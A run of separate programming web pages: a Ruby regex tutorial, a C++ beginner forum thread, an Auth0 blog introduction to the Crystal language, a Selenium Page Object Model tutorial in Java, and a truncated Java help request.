This is the first example of regular expressions in Ruby; below is the explanation of the code. This example checks whether the search string is available inside the sentences. We have three variables - sentence1, sentence2, and sentence3 - and all of them contain sentences. Our goal is to check whether each variable's sentence contains a particular word or pattern, for example sofa, car, and city. The first two contain sofa and car, but sentence3 does not contain city. The code below prints a success message for the first two cases, while the third case reports that the term is not found.

Code:

sentence1 = "This is a very beautiful sofa";
sentence2 = "This is a very beautiful car";
sentence3 = "This is a very beautiful house"

if ( sentence1 =~ /sofa(.*)/ )
  puts "sentence1 contains sofa"
end

if ( sentence2 =~ /car(.*)/ )
  puts "sentence2 contains car"
end

if (sentence3 =~ /city(.*)/)
  puts "sentence3 contains city"
else
  puts "The term city is not there in this sentence3"
end

Output:

Example #2

Operators used in these examples are,

- \D (expression): Matches any non-digit character; similar classes include \d (any digit), \s (whitespace characters), and \S (non-whitespace characters).
- gsub! (method): Replaces every occurrence of the pattern in the string, in place, with the second argument passed to it.

We can explain the below code in the following steps. We have defined a variable student, which contains a sentence with a registration number and a few more details. The registration number is the only numeric value in the given sentence. Here we are fetching the registration number with the help of the gsub! method, which deletes every character matching /\D/ (i.e., every non-digit), leaving only the registration number.
Code:

# The student variable contains the student details along with the registration number in the same sentence.
student = "My name is Ranjan Kumar and my registration number is 111100011"
student = student.gsub!(/\D/, "")
puts "Student Registration Number is #{student}"

Output:

Example #3

Operators used for this example,

- sub! (method): Replaces the first match of the pattern with the given replacement, modifying the string in place (it returns nil if no substitution was made).
- /#.*$/ (expression): This expression selects a # symbol and everything after it up to the end of the line - i.e., a Ruby-style comment. The .* selects everything after the specific symbol #.

This example keeps both the text and the numbers, discarding everything from the # onwards. We can explain the below example in the following steps. We have a variable called card which holds a sentence containing card details and a few more contents. Here we are using Ruby's sub! function, passing the pattern /#.*$/, which tells the function to keep the contents of the sentence and discard the part starting with #.

Code:

card = "The debit card number is 2222-8880-8989-6789 #valid for 3 days only"
# Delete Ruby-style comments
card = card.sub!(/#.*$/, "")
puts "#{card}"

Output:

Example #4

Operators used for this example are,

- match (method): Returns a MatchData object for the first match of the pattern, or nil if there is no match.
- [^aeiou\W] (expression): Inside the brackets, the ^ negates the class, so this matches any character that is neither a vowel nor a non-word character - in other words, a word character that is not a vowel.

In the below example we are trying to find whether the given name starts with a vowel. We return true if it does not start with a vowel and false if it does. We can explain the below code in the following steps. First, we have defined a function with the name not_start_with_vowel, and this function takes a string as its parameter.
This string is the name passed in by the caller, to be checked for whether it starts with a vowel. Here we are using Ruby's match method to perform the check. We have used the pattern /^[^aeiou\W]/i: the first ^ anchors the match at the start of the string, and the negated character class [^aeiou\W] matches any word character that is not a vowel. Finally, we have an if and else block: if the first letter is a vowel, the pattern does not match, match returns nil, and the function returns false. In the else block, if the result is not nil - meaning the name does not start with a vowel - it returns true.

Code:

def not_start_with_vowel(string)
  if /^[^aeiou\W]/i.match(string) == nil
    return false
  else
    return true
  end
end

puts "The name ranjan does not start with vowel is #{not_start_with_vowel("ranjan")}"
puts "The name ajay does not start with vowel is #{not_start_with_vowel("ajay")}"

Output:

Conclusion

In this tutorial we learned about regular expressions in Ruby and their uses in the real world. The many examples covered here will be useful whenever you need to filter or validate a given string or set of strings.
https://www.educba.com/regular-expression-in-ruby/?source=leftnav
i'm trying to create a simple program for VC++ 2008. It's been years since i last did a program in C++ and i've never used 2008 before except yesterday. I've been trying to remove these errors for hours already. I'm supposed to take an exam on it today but i still can't run the program. someone told me that i should post this topic here... HELP me pls!

// jkhui.h
#pragma once
#include "stdafx.h"
#include <iostream>
#include "string.h"
using namespace std;

int main;

namespace jkhui{
    public class Class1
    {
        // TODO: Add your methods for this class here.
        {
            long n, f, i;
            cout;//"Enter No: \n"
            cin ;//n
            (i=n i>=1 i--)
            f = f*1
            cout ;//f;
        }
    };
}

and these are the errors i received...

1>------ Build started: Project: jkhui, Configuration: Debug Win32 ------
1>Compiling...
1>jkhui.cpp
1>c:\documents and settings\acer valued client\my documents\visual studio 2008\projects\jkhui\jkhui\jkhui.h(14) : error C2059: syntax error : '{'
1>c:\documents and settings\acer valued client\my documents\visual studio 2008\projects\jkhui\jkhui\jkhui.h(14) : error C2334: unexpected token(s) preceding '{'; skipping apparent function body
1>Build log was saved at "c:\Documents and Settings\acer valued client\My Documents\Visual Studio 2008\Projects\jkhui\jkhui\Debug\BuildLog.htm"
1>jkhui - 2 error(s), 0 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========

I have a feeling that I'm missing something but I just can't find it. HELP please...

1. Please use code tags in future.

2. There are lots of things wrong.

Firstly you haven't defined a method in your class for your code. You can't just put code into a class like you have without defining a method for it.

Secondly you haven't defined a main method for your application. Therefore your application doesn't know which code to run on startup.

Thirdly std::cin and std::cout are used with the << and >> operators e.g.
Code:
int length = 0;
std::cin >> length;
std::cout << length;

Lastly the line

Code:
(i=n i>=1 i--)

makes no sense at all. Do you intend a for loop? In which case the format should be:

Code:
for (i = n; i >= 1; i--)
{
    // code to run every iteration goes in here
}

Darwen.

- PInvoker - the .NET PInvoke Interface Exporter for C++ Dlls.
http://forums.codeguru.com/showthread.php?470439-newbie-on-VC-2008
Crystal is a statically-typed, compiled, systems programming language with the aims of being as fast as C/C++ while having a syntax as readable as Ruby. This article is an introduction to the Crystal language, through the eyes of a polyglot programmer. Being a former programmer of both C and Ruby, I have been able to explore the ins and outs of Crystal with an objective mindset and give an unbiased opinion on its features; from its low-level primitives to its familiar syntax, and much in between. I first came across Crystal when I saw @sferik giving a talk on it in Poland back in 2015. Video here. It was a great talk, and sparked my interest in Crystal right there and then. When I initially checked out Crystal, I thought it looked awesome but I was too busy with all the other languages I was using on a daily basis to be able to focus my time properly on it. Alongside being too busy, I couldn't really see why I'd use Crystal instead of using C/Erlang/Go/Ruby - languages that I already knew. What I can say with confidence now, though, is that whilst those languages may all be able to achieve the same end goal, they're each better in their own different ways entirely. When I want to build distributed apps, like my Fist/Bump Heartbeat Monitor - I use Erlang/Elixir. When I want to build an API backend I use Golang. When I want to spend the day with my brains scattered, and most probably in tears - I use C. For readability and demonstrations, I use Ruby. When it comes to writing low-level systems such as daemons and obtuse kernels, while it would be most performant to turn to C - it'd also take me a LONG time to achieve relatively little, and the aforementioned tears would be very likely flowing. This is where Crystal comes in. Having a syntax very similar to Ruby means that the familiarity of Crystal is incredibly enticing. Since the world is obsessed with web apps now, let's take a look at the code required to build a minimal web server in both Crystal and Ruby.
In Ruby, using Sinatra, the code is as follows:

require "sinatra"

set :logging, false

get "/" do
  content_type "text/plain"
  "Hello, Auth0!"
end

Now in Crystal, check out the equivalent code:

require "kemal"

logging false

get "/" do |ctx|
  ctx.response.content_type = "text/plain"
  "Hello, Auth0!"
end

Kemal.run

The fact that you can use Ruby syntax highlighting natively for Crystal says everything! Coming from Ruby to Crystal is a remarkably easy adaptation. The fact is, you can copy and paste code from Ruby to Crystal and 90% of the time it will run with no errors. The creators of Crystal understand that Ruby is undoubtedly the most visually appealing language, and therefore built Crystal to take as much influence as possible from a design perspective. You can even run Crystal programs using the Ruby shell command and vice versa, since the syntax is valid for both languages!

Binding C

One of the big selling points for Crystal is the ease with which you can interface with C libraries.

"Crystal allows you to bind to existing C libraries without writing a single line in C. Additionally, it provides some conveniences like out and to_unsafe so writing bindings is as painless as possible."

Let's build a simple script in C that says "hi!". We'll then write a Crystal app to bind to our C library. This is a great starting point for anyone who wants to know about binding C in Crystal.

First off, let's create a project with Crystal's scaffolding tool (I'll cover this feature later). Run:

$ crystal init app sayhi_c

Then head into the directory sayhi_c/src/sayhi_c and let's create a file sayhi.c with the following contents:

#include <stdio.h>

void hi(const char * name){
  printf("Hi %s!\n", name);
}

Now we need to compile our C file into an object. On Ubuntu or Mac using gcc we can run:

$ gcc -c sayhi.c -o sayhi.o

Using the -o flag allows us to create an object file. Once we've got our object file, we can bind it from within our Crystal app.
Open up our sayhi_c.cr file, and have it reflect the following:

require "./sayhi_c/*"

@[Link(ldflags: "#{__DIR__}/sayhi_c/sayhi.o")]
lib Say
  fun hi(name : LibC::Char*) : Void
end

Say.hi("Auth0")

I'll mention now that there are no implicit type conversions except to_unsafe - explained here - when invoking a C function: you must pass the exact type that is expected.

Also worth noting at this point is that since we have built our C file into an object file, we can include it in the project directory and link from there. When we want to link dynamic libraries or installed C packages, we can just link them without including a path.

So, if we build our project file and run it, we get the following:

$ crystal build --release src/sayhi_c.cr
$ ./sayhi_c

> Hi Auth0!

It's really easy to bind to C in Crystal, and is definitely one of the features that attracts me most to the language. I'm really looking forward to writing a C binding for a useful library and being able to utilise this functionality in production!

Concurrency Primitives

One of my favourite parts of Golang is the goroutine threading system. Working in the database industry, I got a real passion for concurrency & parallelism, and when looking at a new language, one of the first things I explore is its concurrency primitives.

In Crystal, we can use the spawn functionality in a very similar way to goroutines in Golang, core.async in Clojure, or the lightweight threading in Elixir/Erlang. For a simple test, I wrote two quick scripts to compare the spawn functionality in Crystal against threading in Ruby. We all know that Ruby is not a great language for threading, so I'm interested to see how much better Crystal is in small experiments.

Let's take the following example in Ruby:

1000.times.map do
  Thread.new do
    puts "Hello?"
  end
end.each(&:join)

Running this from the terminal I got the following results:

$ time ruby spawntest.rb
real  0m0.288s
user  0m0.132s
sys   0m0.116s

I ran this little script on one of my ancient laptops that runs only 2gb of RAM and a terrible, terrible processor.

Now, porting this script to Crystal, we can write:

channel = Channel(String).new

1000.times do
  spawn { channel.send "Hello?" }
  puts channel.receive
end

Running this script with the crystal command, I got the following results:

$ time crystal spawntest.cr
real  0m1.129s
user  0m0.952s
sys   0m0.276s

Hmmmm, very interesting indeed! Well, seeing as Crystal is a compiled language and meant to be used to build small binaries that are easily distributed, it'd be a good idea to compile this small script and use that data instead! I compiled the script using the --release flag - this tells the Crystal compiler to optimise the bytecode.

$ crystal build --release spawntest.cr
$ time ./spawntest
real  0m0.008s
user  0m0.004s
sys   0m0.000s

As you can see, this result is markedly different. Using the --release flag when building the Crystal executable cuts out a lot of bloat and optimises the executable to be as efficient as possible.

Obviously, the above test is a very naive use of the spawn functionality, and unfortunately, I haven't had the opportunity to test it in a load-heavy production environment. But soon I fully intend to, and I'll write another article benchmarking this in detail when I have a good use case and get the chance to!

Built-in Tooling in Crystal

One of the things I like most about Crystal is the excellent built-in tooling available. When I look at new languages, especially relatively immature languages, it's always very reassuring when the language has extensive built-in tooling available to help developers stay productive & happy!

In Crystal, there are a bunch of tools that make hacking around in the language super fun, but also help us to stay on the right track with semantics etc.
Testing

If you're coming from a Ruby/Rails background, I think you'll be very happy with the built-in testing framework that ships with Crystal. It's rather reminiscent of RSpec, and will be really easy to use for anyone coming from a similar background. Even if you're not from a Ruby/Rails background, it's a great testing tool and is super effective.

Using the Greeter demo app from the Crystal docs, we could write our specs as follows:

require "spec"
require "../lib/greeter" # demo greeter class

describe Greeter do
  describe "#shout" do
    it "returns upcased string" do
      Greeter.new.shout("hello auth0").should eq "HELLO AUTH0"
    end
  end

  describe ".hello" do
    it "returns a static Hello string" do
      Greeter.hello.should eq "Hello"
    end
  end
end

As you can see, this spec should look very familiar to any Rubyists, and this style is becoming the preferred syntax for application testing across many languages - there now being RSpec-clone libraries for most of them!

Project Scaffold

Much the same as Elixir having the Mix manager, and Erlang the Rebar manager, Crystal has its own built-in project scaffolder & package manager. I'd recommend using this at all times to ensure semantics are followed. We can use it with the following:

$ crystal init lib my_cool_lib
create my_cool_lib/.gitignore
create my_cool_lib/LICENSE
create my_cool_lib/README.md
create my_cool_lib/.travis.yml
create my_cool_lib/shard.yml
create my_cool_lib/src/my_cool_lib.cr
create my_cool_lib/src/my_cool_lib/version.cr
create my_cool_lib/spec/spec_helper.cr
create my_cool_lib/spec/my_cool_lib_spec.cr
Initialized empty Git repository in ~/my_cool_lib/.git/

Sharding

No - not creating database shards (luckily)! Shards are Crystal's packages, distributed in the same way as Ruby gems, Elixir libs or Golang packages. Each application we create contains a file in the root directory named shard.yml. This file contains project details and external dependencies.
The shard.yml file in my sayhi_c app above looks like this:

name: sayhi_c
version: 0.1.0

authors:
  - Robin Percy <robin@percy.pw>

targets:
  sayhi_c:
    main: src/sayhi_c.cr

crystal: 0.22.0

license: MIT

The app I built has no dependencies to use, but if we want to include external packages we can do so by adding them at the bottom of the file:

dependencies:
  crystal-github:
    github: felipeelias/crystal-github
    version: ~> 0.1.0
Seeing this as an opportunity instead of a foible - it's actually kind of cool, because this means we can write documentation ourselves and hack sample apps together to become early adopters and decent contributors in the Crystal community! Aside - Auth0 & JWTs in Crystal Update: - I have written about securing a Crystal web app with Auth0 & JWT's here. At the moment, there is no Crystal-Auth0 library to use for end-to-end application securing. However, there is a JWT library available for Crystal already here. One thing to note here is that the Crystal-JWT library does not yet support the RS256 algorithm, which is the preffered algorithm and only supports the HS256 algorithm. When setting up your application in the Auth0 control panel, make sure to select the HS256 algorithm to reflect this. In my next series of articles, I will be writing specifically about using Auth0 in a NON-jwt context, and I'll make sure I demonstrate this in Crystal! Of course, if you're looking to secure a Crystal-based web app, you can always simply use the Auth0 Centralised Login. The Centralised Login will allow you to have immediate drop-in user management functionality. Conclusion I really rather like it! Although relatively immature, Crystal is a promising language with a growing Dev community surrounding it. In my previous article about Auth0 Lock / Iris Image Recognition, I mentioned the fact that it'd be better to use the pHash / Blockhash libraries for a production environment. If I was to build that system, I would most definitely use Crystal to bind to those C libraries. I know that I'd be getting fantastically close-to-C speeds, and with the ease and joy of writing Crystal! I am very much looking forward to seeing where this language goes. I think the adoption rate will rapidly increase and I'm excited to see startups using it in production systems. I am currently experimenting in building a Crystal library for the Auth0 API. 
I will write another article on building an API client in Crystal when I'm finished. I do hope this article has inspired you to give Crystal a try, and look forward to hearing your feedback if/when you do! If you need any help and want to ask questions, reach out to me via email and @rbin on twitter, I'm happy to help!
https://auth0.com/blog/an-introduction-to-crystal-lang/
As we continue to leverage the benefits of automating test cases using Selenium, we see that it often becomes difficult to maintain them as our project grows. There would be instances when we use a specific web element at different points in our test script. For example, you might have to search for different test data for a test case, and you would have to refer to the id or XPath of the search text field again and again. In such scenarios, you might find that your code is becoming duplicated, i.e., you are using the same piece of code to locate a web element again and again, often termed redundancy. Additionally, if there is a change in such a locator, you will have to go through the entire code to make the necessary changes. Consequently, the Page Object Model comes to the rescue to simplify the project and make it easy to maintain and use.

Subsequently, in this article, we will understand more about the Page Object Model design pattern. In addition to that, we will also learn how to use it in Selenium to optimize test scripts. We will go through the below topics:

- What is the Page Object Model (POM)?
- Why do we need a Page Object Model?
- What are the advantages of the Page Object Model?
- How to implement the Page Object Model in Selenium?
- How to define Page classes?
- Also, how to define Test classes?
- How does POM rescue in case of frequent locator changes?

What is the Page Object Model (POM)?

Page Object Model, or POM, is a design pattern or framework used in Selenium to create an object repository of the different web elements across the application. To simplify, in the Page Object Model framework, we create a class file for each web page. This class file consists of the different web elements present on the web page. Moreover, the test scripts then use these elements to perform different actions. Since each page's web elements are in a separate class file, the code becomes easy to maintain and reduces code duplicity.
The below diagram shows a simple project structure implementing POM. As you can see, we create different classes for the multiple pages and then save those pages' web elements in them. Correspondingly, we save the test cases under a different package, making a clear segregation between the different aspects. Let's quickly understand why the need for the Page Object Model arose.
Why do we need a Page Object Model?
Selenium automation is not a tedious job. All you need to do is find the elements and perform actions on them. To understand the need for POM, let us consider a simple use case:
- Firstly, navigate to the demo website.
- Secondly, log in to the store.
- Thirdly, capture the dashboard title.
- Finally, log out of the store.
Note: We will be using the demo testing website for the examples in our post.
The code for the use case without using POM would look like below:

package simple_Project;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.chrome.ChromeDriver;

public class Test_Without_POM {

    public static void main(String[] args) throws InterruptedException {

        //Instantiating chrome driver
        WebDriver driver = new ChromeDriver();

        //Opening web application
        driver.get("

        //Locating the Login button and clicking on it
        driver.findElement(By.id("login")).click();

        //Locating the username & password and passing the credentials
        driver.findElement(By.id("userName")).sendKeys("gunjankaushik");
        driver.findElement(By.id("password")).sendKeys("[email protected]");

        //Click on the login button
        driver.findElement(By.id("login")).click();

        //Print the web page heading
        System.out.println("The page title is : " + driver.findElement(By.xpath("//*[@id=\"app\"]//div[@class=\"main-header\"]")).getText());

        //Click on Logout button
        driver.findElement(By.id("submit")).click();

        //Close driver instance
        driver.quit();
    }
}

As visible in the script, we locate each web element, like the login button, username, password field, etc.
and then perform the corresponding action, like click() or sendKeys(). It looks simple, but as the test suite grows, the code becomes complex and challenging to maintain. Script maintenance becomes cumbersome because several test scripts may use the same web element: a small change in the element leads to a change in every script that uses it, which takes a lot of time and carries a high chance of errors. The resolution to this problem is the Page Object Model framework, or Page Object Model design pattern. Using POM, you create an object repository, which you can refer to at various points in your test scripts. Consider a scenario where I have to test login with different users; I will be reusing the same web elements again and again in my test script. If the locator value of the login button changes, I would have to change it in several locations, and I might miss one. Using the Page Object Model approach here simplifies code management and makes the code more maintainable and reusable.
What are the advantages of the Page Object Model?
In the section above, we saw why a non-POM project can become difficult to maintain, which is in itself a strong argument for POM. Below are some advantages of using the Page Object Model that highlight its efficiency:
- Makes code maintainable: since the test classes are separate from the classes containing the web elements and the operations on them, updating the code is very easy when a web element changes or a new one is added.
- Makes code readable: a user can easily read through the project and test scripts thanks to the clear separation between the test classes and the different web pages.
- Makes code reusable: if multiple test scripts use the same web elements, we need not write code to handle the web element in every test script.
Placing it in a separate page class makes it reusable, accessible from any test script.
How to implement the Page Object Model in Selenium?
After understanding the Page Object Model's importance, we will now implement it for the use case considered above. Our Page Object Model project structure would look like below: We will be automating the same use case as in the section above and walking through the implementation incrementally.
How to define Page classes?
We will work with the different pages first, storing the web elements present on each page in a corresponding Java class.
HomePage.java
The home page of the dummy website looks like below, and the highlighted element is the one we store in our HomePage.java class. Create a Java class for the Home Page. This class contains the web elements present on the Home Page, like the Login button, and the operations performed on these elements.

package pages;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;

public class HomePage {

    WebDriver driver;

    //Constructor that will be automatically called as soon as the object of the class is created
    public HomePage(WebDriver driver) {
        this.driver = driver;
    }

    //Locator for login button
    By LoginBtn = By.id("login");

    //Method to click login button
    public void clickLogin() {
        driver.findElement(LoginBtn).click();
    }
}

Let us now go through the code line by line to understand how the page class holds the web elements.
- Import statement - org.openqa.selenium.By: this imports the By class, whose methods help locate web elements on a page.
- Next, a constructor public HomePage(WebDriver driver) is created, with WebDriver passed as an argument. This constructor is called as soon as an object of the HomePage class is created.
- The constructor contains the line this.driver = driver. The this keyword initializes the local driver variable with the actual driver we will use in our test class.
The actual driver is the one we pass as an argument to the constructor. In simple words, when we create a HomePage object in the test class, we pass the driver (which is initialized in the test class) as an argument; the same driver is then passed on to the constructor, and the locally declared driver in the HomePage class is initialized with the test class's actual driver.
- By LoginBtn = By.id("login"): an object of the By class is created, identifying the element in the document by its id. You can use any other locator to locate web elements with By; refer to our article on Selenium Locators for more on locators.
- A method is then created containing the code that performs the action(s) on the identified locator(s).
- driver.findElement(LoginBtn).click(): the findElement method locates the Login button and the click() action is performed on it.
LoginPage.java
The next page to work on is the Login page, which looks like below. After we click Login on the Home Page, we are redirected to the Login Page, where we enter the username and password and hit the Login button. The LoginPage class contains the web elements and the corresponding actions, shown in the code below.
package pages;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;

public class LoginPage {

    WebDriver driver;

    //Constructor that will be automatically called as soon as the object of the class is created
    public LoginPage(WebDriver driver) {
        this.driver = driver;
    }

    //Locator for username field
    By uName = By.id("userName");

    //Locator for password field
    By pswd = By.id("password");

    //Locator for login button
    By loginBtn = By.id("login");

    //Method to enter username
    public void enterUsername(String user) {
        driver.findElement(uName).sendKeys(user);
    }

    //Method to enter password
    public void enterPassword(String pass) {
        driver.findElement(pswd).sendKeys(pass);
    }

    //Method to click on Login button
    public void clickLogin() {
        driver.findElement(loginBtn).click();
    }
}

The initial part of the code is the same as for all the page classes, i.e., the constructor that initializes the actual driver.
- By uName = By.id("userName"), By pswd = By.id("password") and By loginBtn = By.id("login"): the locators for the username field, password field and login button are stored in uName, pswd and loginBtn respectively, using the By class.
- A method corresponding to each web element action is then created:
- Enter the username in the username field - public void enterUsername(String user): the method accepts a String value for the username, which is passed to the sendKeys method by driver.findElement(uName).sendKeys(user).
- Enter the password in the password field - public void enterPassword(String pass): the method accepts a String value for the password, which is passed to the sendKeys method by driver.findElement(pswd).sendKeys(pass).
- Click the Login button - public void clickLogin(): the method takes no argument, and driver.findElement(loginBtn).click() clicks the login button.
Dashboard.java
The last page in our example is the Dashboard after logging in.
It will look like below. Once we log in, we will capture the page heading and locate the Logout button to log out of the application.

package pages;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;

public class Dashboard {

    WebDriver driver;

    //Constructor that will be automatically called as soon as the object of the class is created
    public Dashboard(WebDriver driver) {
        this.driver = driver;
    }

    //Locator for the page heading
    By heading = By.xpath("//div[@class=\"main-header\"]");

    //Locator for Logout button
    By logoutBtn = By.id("submit");

    //Method to capture the page heading
    public String getHeading() {
        String head = driver.findElement(heading).getText();
        return head;
    }

    //Method to click on Logout button
    public void clickLogout() {
        driver.findElement(logoutBtn).click();
    }
}

As we have already understood the use of the constructor in the two page classes above, let's see the next lines of code.
- By heading = By.xpath("//div[@class=\"main-header\"]") and By logoutBtn = By.id("submit"): the By class locates the heading we seek on the web page using its XPath, and the logout button using its id.
- Next, the method public String getHeading() retrieves the text from the heading web element. The method's return type is String, and it returns the heading retrieved with the getText() method.
- We create the method public void clickLogout() to click on the logout button using the click() method.
How to define Test classes?
After creating the required classes for the different pages, we will now create a test class with the execution steps. These steps reference the object repository created for the different page elements. Let us quickly have a look at the code and then understand it step by step.

public class TestCase {

    public static void main(String[] args) throws InterruptedException {

        System.setProperty("webdriver.chrome.driver", "---Exact path to chromedriver.exe---");

        //Instantiating chrome driver
        WebDriver driver = new ChromeDriver();

        //Opening web application
        driver.get("

        //Creating objects of the page classes
        HomePage home = new HomePage(driver);
        LoginPage login = new LoginPage(driver);
        Dashboard dashboard = new Dashboard(driver);

        //Click on login button on home page
        home.clickLogin();

        //Enter user credentials
        login.enterUsername("---Your Username---");
        login.enterPassword("---Your Password---");

        //Click on login button
        login.clickLogin();

        Thread.sleep(3000);

        //Capture the page heading and print on console
        System.out.println("The page heading is --- " + dashboard.getHeading());

        //Click on Logout button
        dashboard.clickLogout();

        //Close browser instance
        driver.quit();
    }
}

Let us now understand the test case code line by line.
- System.setProperty("webdriver.chrome.driver", "---Exact path to chromedriver.exe---"): we set the system property that locates chromedriver.exe on the local system.
- WebDriver driver = new ChromeDriver(): the Chrome driver is instantiated through a WebDriver reference.
- driver.get(" : using the WebDriver get() method, we navigate to the test URL.
- Next we create objects of the three page classes we built: HomePage home = new HomePage(driver);, LoginPage login = new LoginPage(driver); and Dashboard dashboard = new Dashboard(driver);. As discussed for the first page class's constructor, the driver is passed as an argument during each object's creation; this is the actual driver that initializes the driver in the page class.
- After creating an object of each class, we can easily reference any method through it. We now execute our test steps.
- home.clickLogin(): using the object of the HomePage class, we call the clickLogin() method.
- Once we reach the Login page, we use the LoginPage object to call the enterUsername("your username"), enterPassword("your password"), and clickLogin() methods. Note that you can create your own username and password and pass them as method arguments.
- Next, we capture the page heading and click logout through the Dashboard class object, accessing its getHeading() and clickLogout() methods.
- After performing all the actions, we close the browser instance with driver.quit().
Now that we have created the page classes required to execute our test case and understood the underlying code, we can run the test class and see the results. The web browser opens the test website, the test steps run in sequence, and the console displays the page heading as intended.
How does POM rescue in case of frequent locator changes?
Now, let me give you an example of how the Page Object Model framework keeps the code maintainable and helps avoid errors when a locator value changes.
Consider the below use case:
- Navigate to the demo website.
- Login with a valid username & password and capture the page heading.
- Logout from the session.
- Now login with an invalid username & password and verify the URL.
As is evident from the use case, we will be using the login text fields and the login button multiple times. First, let's see how the code would look without the Page Object Model design technique.

package nonPOM;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;
import org.openqa.selenium.chrome.ChromeDriver;

public class Login {

    public static void main(String[] args) throws InterruptedException {

        System.setProperty("webdriver.chrome.driver", "D:\\Selenium\\drivers\\chromedriver.exe");
        WebDriver driver = new ChromeDriver();
        driver.manage().window().maximize();
        driver.get("

        //First test case for valid login
        //Finding the web elements and passing the values
        driver.findElement(By.id("userName")).sendKeys("gunjankaushik");
        driver.findElement(By.id("password")).sendKeys("[email protected]");
        driver.findElement(By.id("login")).click();

        Thread.sleep(5000);

        //Capture the page heading and print on console
        System.out.println("The page heading is --- " + driver.findElement(By.xpath("//div[@class=\"main-header\"]")).getText());

        //Logout from the session
        driver.findElement(By.id("submit")).click();

        //Second test case for invalid login credentials
        driver.findElement(By.id("userName")).sendKeys("abdc");
        driver.findElement(By.id("password")).sendKeys("Password");
        driver.findElement(By.id("login")).click();

        String expectedURL = "
        String actualURL = driver.getCurrentUrl();

        if (actualURL.equalsIgnoreCase(expectedURL))
            System.out.println("Test passed !!!!");
        else
            System.out.println("Test failed");

        //Closing browser session
        driver.quit();
    }
}

Now suppose the locator for the login button changes. To correct the test script, you would have to change the login button locator in two places.
That is to say, at both lines where the login button is located. If instead we use the Page Object pattern in this scenario, we only have to change the login button locator in the page class for the login page; we don't have to touch every place that refers to the login locator. Did you see how easy it was to segregate the page web elements using the Page Object Model and use them in our test case? You can now try out a practice problem to strengthen your understanding of the Page Object Model in Selenium.
Practice Exercise
Use Case
- First, log in to the demo website.
- Secondly, on the dashboard page, locate the search text field and enter a search string.
- After that, print the search string on the console.
Try out the above test steps by adding more web elements to the Dashboard page class. You can also refer to the updated code of the Dashboard page class and the test class below.
Dashboard.java

package pages;

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;

public class Dashboard {

    WebDriver driver;

    public Dashboard(WebDriver driver) {
        this.driver = driver;
    }

    //Locator for the page heading
    By heading = By.xpath("//div[@class=\"main-header\"]");

    //Locator for Logout button
    By logoutBtn = By.id("submit");

    //Locators for search field and search button
    By searchField = By.id("searchBox");
    By searchBtn = By.xpath("//*[@id=\"basic-addon2\"]");

    //Method to capture the page heading
    public String getHeading() {
        String head = driver.findElement(heading).getText();
        return head;
    }

    //Method to enter search string and display the same on console
    public void enterSearchStr(String str) {
        driver.findElement(searchField).sendKeys(str);
        System.out.println("The search string is : " + str);
        driver.findElement(searchBtn).click();
    }

    //Method to click on Logout button
    public void clickLogout() {
        driver.findElement(logoutBtn).click();
    }
}

Test Case Class

public class TestCase {

    public static void main(String[] args) throws InterruptedException {

        System.setProperty("webdriver.chrome.driver", "D:\\Selenium\\drivers\\chromedriver.exe");

        //Instantiating chrome driver
        WebDriver driver = new ChromeDriver();

        //Opening web application
        driver.get("

        //Creating objects of the page classes
        HomePage home = new HomePage(driver);
        LoginPage login = new LoginPage(driver);
        Dashboard dashboard = new Dashboard(driver);

        //Click on login button on home page
        home.clickLogin();

        //Enter user credentials
        login.enterUsername("gunjankaushik");
        login.enterPassword("[email protected]");

        //Click on login button
        login.clickLogin();

        Thread.sleep(3000);

        //Capture the page heading and print on console
        System.out.println("The page heading is --- " + dashboard.getHeading());

        //Perform search and display search string on console
        dashboard.enterSearchStr("java");

        //Click on Logout button
        dashboard.clickLogout();
    }
}

Key Takeaways
- We understood what the Page Object Model design pattern is and how it enhances our test scripts.
- We saw the various advantages of using a Page Object Model framework over a regular approach, especially its benefits of improving code readability and reducing duplication.
- We then saw how to make a test framework efficient by using one page class per web page of the application; these page classes hold the elements present on the corresponding pages and their relevant action methods.
- Finally, we created a test class that uses the objects created in the page classes, keeping the test script separate from the object repository.
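To drive the single-point-of-change idea home, here is a small stdlib-only Java sketch. It deliberately avoids Selenium, so the page and method names are invented and plain strings stand in for By locators; treat it as an illustration of the design principle, not project code. Both simulated tests read the login button locator from one page class, so a locator change is a one-line edit:

```java
import java.util.ArrayList;
import java.util.List;

public class LoginPageLocators {

    // Single source of truth for the locator values; in a real POM project
    // these would be By objects inside the LoginPage class.
    static class LoginPage {
        static final String USERNAME_FIELD = "id=userName";
        static final String PASSWORD_FIELD = "id=password";
        static final String LOGIN_BUTTON   = "id=login";
    }

    // Two "test cases" that both need the login button locator.
    static List<String> validLoginSteps() {
        List<String> steps = new ArrayList<>();
        steps.add("type into " + LoginPage.USERNAME_FIELD);
        steps.add("type into " + LoginPage.PASSWORD_FIELD);
        steps.add("click " + LoginPage.LOGIN_BUTTON);
        return steps;
    }

    static List<String> invalidLoginSteps() {
        List<String> steps = new ArrayList<>();
        steps.add("type into " + LoginPage.USERNAME_FIELD);
        steps.add("click " + LoginPage.LOGIN_BUTTON);
        return steps;
    }

    public static void main(String[] args) {
        // Both flows pick up the same locator value; editing LOGIN_BUTTON
        // once would update every test that uses it.
        System.out.println(validLoginSteps());
        System.out.println(invalidLoginSteps());
    }
}
```

If LOGIN_BUTTON ever changed, only the one constant in LoginPage would need editing, exactly as with the page classes above.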
Hi guys, I'm new to programming. I'm supposed to write a sum-then-average program in which the output requests four numbers from the user, adds them up, gets the average, and then counts how many values in the array are greater than the average. I keep getting stuck on the formula portions, and I'm pretty sure there will be more errors after that, but right now I'm trying to get past these two errors. Please help! Thanks!

import java.util.Scanner;

public class AverageArray {

    public static void main(String[] args)
    {
        final int TOTAL_NUMBERS = 4;
        int[] numbers = new int[TOTAL_NUMBERS];
        float sum;

        //Create a Scanner
        Scanner input = new Scanner(System.in);

        //Read all numbers
        for (int i = 0; i < numbers.length; i++)
        {
            System.out.print("Enter a number:");
            //Convert String into integer
            numbers[i] = input.nextInt();
        }

        //Find the sum and average
        for (int i = 0; i < numbers.length; i++)
            float sum += numbers[i];
            int average = float sum / TOTAL_NUMBERS;
        }

        //Find the average of the largest number
        int count = 0
        for (int i = 0; i < numbers.length; i++)
        {
            if (numbers[i] == max)
                count++;
        }

        //Prepare the result
        String output = "The array is";
